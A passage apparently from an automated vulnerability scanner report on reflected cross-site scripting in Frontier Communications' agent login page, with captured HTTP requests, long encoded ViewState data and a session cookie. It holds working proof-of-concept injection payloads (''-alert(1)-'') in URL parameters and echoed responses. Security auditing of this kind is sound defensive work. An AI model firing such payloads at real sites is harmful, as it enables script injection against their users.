wAF%2FAE8cD48c3Ryb25nPkxvZ2luIEZvciBGcm9udGllciBBZ2VudHMvUGFydG5lcnMgT25seS4gIEN1c3RvbWVycyBwbGVhc2UgdmlzaXQgPGJyPiA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbSI%2BRnJvbnRpZXIgUmVzaWRlbnRpYWwgSG9tZSBQYWdlPC9hPiBvciA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbS9DdXN0b21lclNlcnZpY2UvIj5Db250YWN0IFVzIFBhZ2U8L2E%2BIGZvciBBc3Npc3RhbmNlLjwvc3Ryb25nPjwvcD5kAg8PDxYCHgxFcnJvck1lc3NhZ2UFjgc8cCBhbGlnbj0ibGVmdCI%2BDQoJCQkJPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5Zb3UgaGF2ZSBlbnRlcmVkIGFuIEludmFsaWQgVXNlcm5hbWUgb3IgUGFzc3dvcmQuIFBsZWFzZSBub3RlIHRoYXQgdGhpcyBsb2dpbiBpcyBmb3IgQWdlbnRzL1BhcnRuZXJzIG9mIEZyb250aWVyIENvbW11bmljYXRpb25zIG9ubHkuPC9zcGFuPiA8L3A%2BDQo8dWw%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGEgUmVzaWRlbnRpYWwgQ3VzdG9tZXIsIHBsZWFzZSBjb250YWN0IDEtODAwLTkyMS04MTAxIG9yIHZpc2l0IHRoZSA8L3NwYW4%2BPGEgdGl0bGU9IlJlc2lkZW50aWFsIENvbnRhY3QgVXMgcGFnZSIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iIHRhcmdldD0iX3NlbGYiPjxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BUmVzaWRlbnRpYWwgQ29udGFjdCBVcyBwY
WdlPC9zcGFuPjwvYT7CoDxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BdG8gcmVhY2ggQ3VzdG9tZXIgU2VydmljZS48L3NwYW4%2BPC9kaXY%2BPC9saT4NCjxwIGFsaWduPSJsZWZ0Ij48c3BhbiBzdHlsZT0iQ09MT1I6ICNmZjAwMDAiPjwvc3Bhbj48L3A%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj48L3NwYW4%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGFuIEFnZW50L1BhcnRuZXIgb2YgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgYW5kIG5lZWQgYXNzaXN0YW5jZSB3aXRoIHlvdXIgTG9naW4sIHBsZWFzZSBjb250YWN0IDEtODY2LTc0NS05MTIyLjwvc3Bhbj48L2Rpdj48L2xpPg0KPHA%2BPC9wPjwvdWw%2BZGQCDQ8PFgIfAmhkZAIRD2QWAmYPFgIfAAXQGTxkaXYgY2xhc3M9ImZvb3RlciI%2BDQogICAgPGRpdiBjbGFzcz0iZm9vdGVyLXNlY3Rpb25zIj4NCiAgICAgICAgPGRpdiBpZD0iaGVscFN1cHBvcnQiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5IZWxwICZhbXA7IFN1cHBvcnQgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY3VzdG9tZXJzZXJ2aWNlLyI%2BQ29udGFjdCBGcm9udGllcjwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvYmlsbGluZy8iPkJpbGxpbmcgJmFtcDsgUGF5bWVudCBJbmZvcm1hdGlvbjwvYT4NCiAgICAgICAgICAgICAgICA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9jYXJyaWVyZnJlZXplLyI%2BUHJvdGVjdCBZb3VyIEFjY291bnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3JldGFpbHN0b3Jlcy8iPkxvY2F0ZSBSZXRhaWwgU3RvcmVzPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Imh0dHA6Ly93d3cuZnJvbnRpZXJoZWxwLmNvbS90ZWNoc3VwcG9ydCI%2BVGVjaG5pY2FsDQogICAgICAgICAgICAgICAgICAgIFN1cHBvcnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJwcm9ncmFtcyI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPlF1aWNrIExpbmtzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwczovL2Zyb250aWVyLmdsb2J5c29ubGluZS5
jb20vY3Yvc2NyaXB0cy9BQkUwL2VuZy9sb2cuYXNwP2dydT00Mzc2NjI5MTAmYW1wO3NlYz0iPg0KICAgICAgICAgICAgICAgICAgICBCdXNpbmVzcyBPbmxpbmUgQmlsbCBQYXk8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2ZyaWVuZGxpbmsvIj5DdXN0b21lciBSZWZlcnJhbDwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZG9uYXRlLyI%2BR3JlYXQgRnJvbnRpZXIgRG9uYXRlPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9kaXNjb3VudHByb2dyYW1zLyI%2BRGlzY291bnQgUHJvZ3JhbXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9hZHZlcnRpc2UvIj5BZHZlcnRpc2Ugd2l0aCBVczwvYT4gPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImFib3V0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BQWJvdXQgVXM8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvY29ycG9yYXRlX2NvbW11bmljYXRpb25zLyI%2BQ29ycG9yYXRlIENvbW11bmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jb3Jwb3JhdGUuZnJvbnRpZXIuY29tL2RlZmF1bHQuYXNweD9tPTUmYW1wO3A9NDMiPkNhcmVlcnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL3BoeC5jb3Jwb3JhdGUtaXIubmV0L3Bob2VuaXguemh0bWw%2FYz02NjUwOCZhbXA7cD1pcm9sLWlyaG9tZSI%2BSW52ZXN0b3INCiAgICAgICAgICAgICAgICAgICAgUmVsYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1uZXdzJmFtcDtueW89MCI%2BDQogICAgICAgICAgICAgICAgICAgIFByZXNzIFJvb208L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL2ZhY2VzX29mX2Zyb250aWVyIj5GYWNlcyBvZiBGcm9udGllcjwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGVnYWxSZWd1bGF0b3J5Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BTGVnYWwgJmFtcDsgUmVndWxhdG9yeTwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9wb
2xpY2llcy8iPlBvbGljaWVzICZhbXA7IE5vdGlmaWNhdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvdGVybXMvIj5UZXJtcyBhbmQgQ29uZGl0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvd2hvbGVzYWxlLyI%2BV2hvbGVzYWxlICZhbXA7IENhcnJpZXIgU2VydmljZXM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2NhcnJpZXIuZnJvbnRpZXJjb3JwLmNvbS9jcnRmL3RhcmlmZnMvaW5kZXguY2ZtP2Z1c2VhY3Rpb249bWFpbiZhbXA7c2N0bklEPTE5Ij4NCiAgICAgICAgICAgICAgICAgICAgVGFyaWZmczwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxwIGNsYXNzPSJjbGVhciI%2BDQogICAgICAgIDwvcD4NCiAgICAgICAgPGRpdiBpZD0iZm9vdGVyQ3JlZGl0cyI%2BDQogICAgICAgICAgICA8ZGl2Pg0KICAgICAgICAgICAgICAgIDxzdHJvbmc%2BJmNvcHk7MjAxMSBGcm9udGllciBDb21tdW5pY2F0aW9ucyBDb3Jwb3JhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L3N0cm9uZz4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPCEtLQk8aW1nIHN0eWxlPSJmbG9hdDogcmlnaHQ7IiB3aWR0aD0iMzM5cHgiIGhlaWdodD0iMzdweCIgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL3Bob25lX2NvcHkucG5nIiAgLz4tLT4NCiAgICAgICAgPC9kaXY%2BDQogICAgPC9kaXY%2BDQo8L2Rpdj5kAhMPFgIfAAWJITxicj4KPCEtLU1hcmt1cCBmb3IgSW5pdGlhbCBPdmVybGF5IHRoYXQgY2Fubm90IGJlIGNsb3NlZCB3aXRob3V0IHN1Ym1pdHRpbmcgcGhvbmUvemlwLS0%2BCjxkaXYgaWQ9Im92ZXJTY3JlZW4iPiZuYnNwOzwvZGl2Pgo8ZGl2IGlkPSJvdmVybGF5SW5pdGlhbEZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMSIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMSIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvc
j0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUEiIG5hbWU9InBob25lTnVtQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQicpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUIiIG5hbWU9InBob25lTnVtQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUMiIG5hbWU9InBob25lTnVtQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8bGFiZWw%2Bb3IgWmlwIENvZGU8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQxIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJzdWJtaXRMaW5lIj48aW5wdXQgaWQ9Im92ZXJsYXlTdWJtaXQiIHZhbHVlPSIiIHR5cGU9InN1Ym1pdCI%2BPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgICAgICA8bGFiZWwgaWQ9Im5ld2JUZXh0IiBmb3I9Im5ld2JpZSI%2BQ2hlY2sgaGVyZSBpZiB5b3UgYXJlIGEgbmV3IGN1c3RvbWVyLjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2Pgo8IS0tTWFya3VwIGZvciAgT3ZlcmxheSB0aGF0IGNhbiBiZSBjbG9zZWQgd2l
0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVybGF5Rm9ybSIgY2xhc3M9Im92ZXJsYXkiPgogICAgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZ3JhZGllbnRCb3gucG5nIiBoZWlnaHQ9IjI2MyIgd2lkdGg9IjY0MCI%2BCiAgICA8ZGl2IGNsYXNzPSJvdmVybGF5SW5uZXIiPgogICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJjbG9zZU92ZXJsYXkiPkNMT1NFPC9hPgogICAgICAgIDxoMT5IZWxsbyE8L2gxPgogICAgICAgIDxwPlRvIHByb3ZpZGUgeW91IHdpdGggcHJvZHVjdHMgYW5kIHNlcnZpY2VzIHRoYXQgYmVzdCBtZWV0IHlvdXIgbmVlZHMsIHdlIG5lZWQgdG8ga25vdyB5b3VyIGxvY2F0aW9uLiBUaGlzIGluZm9ybWF0aW9uIGlzIGtlcHQgcHJpdmF0ZSE8L3A%2BCiAgICAgICAgPGZvcm0gbmFtZT0iZkZvcm0yIiBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI%2BCiAgICAgICAgICAgIDxkaXYgaWQ9ImVycm9yRmllbGQyIiBjbGFzcz0ib3ZlcmxheUVycm9yIj5QbGVhc2UgZW50ZXIgYSB2YWxpZCBwaG9uZSBudW1iZXIgb3IgemlwIGNvZGUuPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lTGluZSI%2BCiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwaG9uZSI%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%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcExpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQyIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0Q2hhbmdlIiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9Im5ld2JpZSIgdHlwZT0iY2hlY2tib3giPgogICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KPC9kaXY%2BCmRkCei%2FS%2FmrhIn%2FFNx89jqMRuohsfs%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%2
4btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx');//]]>
...[SNIP]...

2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2920'-alert(1)-'00fe8bd6112a72257 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ0SGVhZGVyIj4KICAgICAgPGRpdiBjbGFzcz0ibG9nbyI%2BCiAgICAgICAgPGEgaWQ9ImhvbWVMaW5rIiB0aXRsZT0iRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMiIGhyZWY9Ii8iPgogICAgICAgICAgPGltZyBhbHQ9IkZyb250aWVyTG9nbyIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZnJvbnRpZXJfTG9nby5qcGciIGJvcmRlcj0iMCIgaGVpZ2h0PSI1MSIgd2lkdGg9IjE1NiI%2BCiAgICAgICAgPC9hPgogICAgICA8L2Rpdj4KICAgICAgPHVsIGlkPSJkcm9wZG93bl9uYXYiPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvQmlsbFBheS9Mb2dpbi5hc3B4Ij5PbmxpbmUgQmlsbCBQYXk8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8iPkZyb250aWVyIE15IFlhaG9vITwvYT48L2xpPgogICAgICAgIDxsaT48YSBocmVmPSJodHRwczovL2xvZ2luLmZyb250aWVyLmNvbS93ZWJtYWlsLyI%2BRnJvbnRpZXIgTWFpbDwvYT48L2xpPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvU2hvcC9Mb2dpbi5hc3B4Ij5NeSBBY2NvdW50PC9hPjwvbGk%2BCiAgICAgICAgPGxpIGlkPSJzZWxlY3RlZCIgY2xhc3M9ImFnZW50bG9naW4iPkFnZW50IExvZ2luIAogICAgICAgICAgPGRpdiBjbGFzcz0iYXJyb3ciPjxpbWcgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vc21hbGxfYXJyb3cucG5nIiBib3JkZXI9IjAiIGhlaWdodD0iNCIgd2lkdGg9IjciPjwvZGl2PgogICAgICAgICAgPHVsPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0FnZW50T3JkZXJpbmcvTG9naW4vIj5SZXNpZGVudGlhbCBBZ2VudDwvYT48L2xpPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0J1c2luZXNzQWdlbnRPcmRlci9Mb2dpbi8iPkJ1c2luZXNzIEFnZW50PC9hPjwvbGk%2BCiAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk%2BCiAgICAgIDwvdWw%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvY2F0aW9uIj5DdXJyZW50IExvY2F0aW9uOgogICAgICAgIDxhIGlkPSJMb2NhbGUiIGNsYXNzPSJjaGFuZ2VMb2NhbGUiIGhyZWY9IiMiPlNlbGVjdCBMb2NhdGlvbjwvYT4KICAgICAgPC9kaXY%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%2BU2VhcmNoIEZyb250aWVyPC9zcGFuPgogICAgICAgICAgPGlucHV0IHZhbHVlPSJQb3J0YWwiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNXT
GluayI%2BU2VhcmNoIHRoZSBXZWI8L3NwYW4%2BCiAgICAgICAgPC9kaXY%2BCiAgICAgIDwvZm9ybT4KICAgIDwvZGl2PgogIDwvZGl2Pgo8L2Rpdj5kAgsPZBYMAgEPZBYCAgEPZBYCZg9kFgJmD2QWAgIBD2QWBgIHDw8WBB8ABQ1FbnRlciBQaG9uZSAjHgtOYXZpZ2F0ZVVybAVKL1JlZ2lvbi9EZWZhdWx0LmFzcHg%2FdHlwZT0xJnVybD0lMmZBZ2VudE9yZGVyaW5nJTJmTG9naW4lMmZEZWZhdWx0LmFzcHglM2ZkZAIJDw8WAh8BBUovUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZkFnZW50T3JkZXJpbmclMmZMb2dpbiUyZkRlZmF1bHQuYXNweCUzZmRkAgsPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPZBYCZg8WAh8ABbwBPGRpdiBpZD0iVG9wTmF2X0NvbnRhaW5lciI%2BDQoJCTwvZGl2Pg0KPGlucHV0IG5hbWU9ImhmUGFnZVR5cGUiIHR5cGU9ImhpZGRlbiIgaWQ9ImhmUGFnZVR5cGUiIHZhbHVlPSIxIi8%2BDQo8aW5wdXQgbmFtZT0iaGZSZWNvcmRfVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZSZWNvcmRfVHlwZSIgdmFsdWU9IkNhdGVnb3J5Ii8%2BDQpkAgkPZBYGAgEPDxYCHwJnZBYCAgEPFgQfAAVjPGEgaHJlZj0iL0RlZmF1bHQuYXNweCI%2BSG9tZTwvYT4gJnJhcXVvOyA8YSBocmVnPSIvQWdlbnRPcmRlcmluZy8iPkFnZW50IE9yZGVyaW5nPC9hPiAmcmFxdW87IExvZ2luHwJnZAIDDxYCHwJoZAIFD2QWBAIBDxYCHwAF%2FAE8cD48c3Ryb25nPkxvZ2luIEZvciBGcm9udGllciBBZ2VudHMvUGFydG5lcnMgT25seS4gIEN1c3RvbWVycyBwbGVhc2UgdmlzaXQgPGJyPiA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbSI%2BRnJvbnRpZXIgUmVzaWRlbnRpYWwgSG9tZSBQYWdlPC9hPiBvciA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbS9DdXN0b21lclNlcnZpY2UvIj5Db250YWN0IFVzIFBhZ2U8L2E%2BIGZvciBBc3Npc3RhbmNlLjwvc3Ryb25nPjwvcD5kAg8PDxYCHgxFcnJvck1lc3NhZ2UFjgc8cCBhbGlnbj0ibGVmdCI%2BDQoJCQkJPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5Zb3UgaGF2ZSBlbnRlcmVkIGFuIEludmFsaWQgVXNlcm5hbWUgb3IgUGFzc3dvcmQuIFBsZWFzZSBub3RlIHRoYXQgdGhpcyBsb2dpbiBpcyBmb3IgQWdlbnRzL1BhcnRuZXJzIG9mIEZyb250aWVyIENvbW11bmljYXRpb25zIG9ubHkuPC9zcGFuPiA8L3A%2BDQo8dWw%2BDQ